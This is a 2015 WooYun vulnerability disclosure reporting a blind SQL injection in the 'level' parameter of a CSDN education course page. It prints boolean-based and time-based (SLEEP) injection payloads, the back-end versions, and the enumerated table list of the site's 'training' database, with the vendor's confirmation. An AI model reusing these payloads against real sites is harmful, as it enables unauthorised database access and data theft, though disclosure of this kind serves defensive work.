当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118343

漏洞标题:CSDN某站点存在SQL盲注

相关厂商:CSDN开发者社区

漏洞作者: 路人甲

提交时间:2015-06-05 07:36

修复时间:2015-07-20 17:22

公开时间:2015-07-20 17:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-05: 细节已通知厂商并且等待厂商处理中
2015-06-05: 厂商已经确认,细节仅向厂商公开
2015-06-15: 细节向核心白帽子及相关领域专家公开
2015-06-25: 细节向普通白帽子公开
2015-07-05: 细节向实习白帽子公开
2015-07-20: 细节向公众公开

简要描述:

王祖蓝,23333.......

详细说明:

http://edu.csdn.net/courses?attr=3&c_id=0&level=1
payload:
盲注1=1

漏洞证明:

---
Parameter: level (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: attr=3&c_id=0&level=1 AND 2659=2659
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: attr=3&c_id=0&level=1 AND (SELECT * FROM (SELECT(SLEEP(5)))bQok)
---
web application technology: PHP 5.5.17
back-end DBMS: MySQL 5.0.12
Database: training
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| course_lesson_record | 391200 |
| course_lecture_students | 291907 |
| log | 204057 |
| test_log | 67653 |
| filter_words | 37477 |
| course_video | 9910 |
| course_video_jobs | 9219 |
| course_tag_relate | 5485 |
| course_statistics | 3559 |
| notice_mail | 2561 |
| order_detail | 1898 |
| type_tag | 1745 |
| orders | 1680 |
| course_fields | 868 |
| c_port_log | 772 |
| tickets | 763 |
| uc_log | 326 |
| course_syllabus | 112 |
| course_agency | 93 |
| combo_course | 83 |
| log_download | 63 |
| column_course_type | 49 |
| m3u8_keys | 31 |
| trial_users | 26 |
| vip_card | 24 |
| vip_card_apply | 18 |
| tickets_group | 10 |
| course_column | 8 |
| vip_card_buy_record | 7 |
| trial_info | 3 |
| alipay_log | 2 |
+-------------------------+---------+

修复方案:

~~~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-06-05 17:20

厂商回复:

尽快修改。

最新状态:

暂无